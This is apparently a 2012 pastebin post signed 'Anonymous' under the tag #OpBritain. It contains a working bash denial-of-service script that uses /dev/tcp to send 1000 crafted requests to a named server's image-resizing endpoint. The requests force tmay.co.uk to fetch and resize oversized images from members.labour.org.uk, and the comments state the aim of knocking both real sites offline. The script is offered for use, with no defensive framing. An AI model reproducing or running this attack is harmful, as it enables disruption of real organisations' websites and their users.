
#OpBritain - tmay.co.uk members.labour.org.uk DOS
By: a guest on
Jun 4th, 2012 | syntax:
Bash | size: 0.48 KB | hits: 444 | expires: Never
#!/bin/bash
for((i=0;i<1000;i++))
do
exec 3<>/dev/tcp/109.104.71.30/80;
printf "GET /images/image.php?image=http://members.labour.org.uk/images/people/${i}/7000.jpg&width=6999&height=6999cache_dir=/dev/null HTTP/1.1\nHost: www.tmay.co.uk\n\n" >&3;
done
#This code will cause the tmay.co.uk website to send requests for, resize and reproduce
#images from the labour website. Causing denial of service conditions for both.
#Don't let it be said that we're partisan.
#- Anonymous